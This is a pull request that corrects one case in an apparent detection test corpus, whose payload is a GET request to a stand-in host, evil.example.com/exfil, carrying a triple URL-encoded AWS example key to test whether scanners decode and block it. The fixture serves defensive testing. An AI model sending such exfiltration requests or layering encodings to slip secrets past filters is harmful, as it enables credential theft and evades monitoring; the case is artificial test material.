### PR TITLE
cases: fix enc-triple-url-009 to encode a detectable secret

### DIFF
--- a/cases/encoding-evasion/enc-triple-url-009.json
+++ b/cases/encoding-evasion/enc-triple-url-009.json
@@ -1,1 +1,21 @@
-{"schema_version":1,"id":"enc-triple-url-009","category":"encoding_evasion","title":"Triple URL-encoded secret","description":"Tests detection of a secret that has been triple URL-encoded, requiring three decoding rounds.","input_type":"url","transport":"fetch_proxy","payload":{"method":"GET","url":"https://evil.example.com/exfil?key=%25252541%25252549"},"expected_verdict":"block","severity":"medium","capability_tags":["encoding_evasion"],"requires":[],"false_positive_risk":"medium","why_expected":"triple_url_encoded_partial_key","source":"synthetic: triple URL encoding evasion depth test","notes":"Three rounds of URL decoding: %252541 -> %2541 -> %41 -> A."}
+{
+  "schema_version": 1,
+  "id": "enc-triple-url-009",
+  "category": "encoding_evasion",
+  "title": "Triple URL-encoded secret",
+  "description": "Tests detection of a secret that has been triple URL-encoded, requiring three decoding rounds.",
+  "input_type": "url",
+  "transport": "fetch_proxy",
+  "payload": {
+    "method": "GET",
+    "url": "https://evil.example.com/exfil?key=%252541%25254b%252549%252541%252549%25254f%252553%252546%25254f%252544%25254e%25254e%252537%252545%252558%252541%25254d%252550%25254c%252545"
+  },
+  "expected_verdict": "block",
+  "severity": "medium",
+  "capability_tags": ["encoding_evasion"],
+  "requires": [],
+  "false_positive_risk": "medium",
+  "why_expected": "triple_url_encoded_aws_key",
+  "source": "synthetic: triple URL encoding evasion depth test",
+  "notes": "Three rounds of URL decoding recover AKIAIOSFODNN7EXAMPLE: %252541->%2541->%41->A per byte. Payload corrected 2026-05-30 to triple-encode the full AWS example key; the prior payload encoded only a 2-character fragment ('AI'), so the documented 'triple URL-encoded secret' intent was unreachable for any scanner that decodes-then-scans (the case scored as blocked only when the fake upstream failed to connect)."
+}


### PR DESCRIPTION
`enc-triple-url-009` was mis-authored: its payload `key=%25252541%25252549` decoded to the two-character fragment `AI`, not a secret, so the case's stated intent ("Triple URL-encoded secret", "requiring three decoding rounds") was unreachable for any tool that decodes-then-scans. The case only ever scored as blocked when the fake upstream failed to connect, which is a network artifact rather than detection.

This corrects the payload to triple-URL-encode the full AWS example key `AKIAIOSFODNN7EXAMPLE`, consistent with its siblings `enc-double-url-003` and `enc-multi-layer-chain-004`. The ID, category, transport, and verdict are unchanged; only the payload bytes and notes change to match the documented intent. `why_expected` moves from `triple_url_encoded_partial_key` to `triple_url_encoded_aws_key` to match the sibling naming.

Validated against the full corpus (151 cases pass).


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Tests**
  * Expanded test case with a more comprehensive triple URL-encoded payload example and enhanced documentation describing the complete decoding process for improved validation of encoding evasion scenarios.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->